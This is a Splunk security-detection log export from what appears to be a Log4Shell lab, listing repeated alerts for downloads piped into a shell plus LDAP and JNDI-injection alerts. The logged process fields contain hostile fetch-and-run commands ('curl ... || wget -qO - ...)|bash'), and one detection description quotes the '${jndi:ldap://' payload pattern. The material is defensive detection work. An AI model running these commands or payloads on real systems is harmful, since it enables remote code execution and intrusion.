annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644552, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, 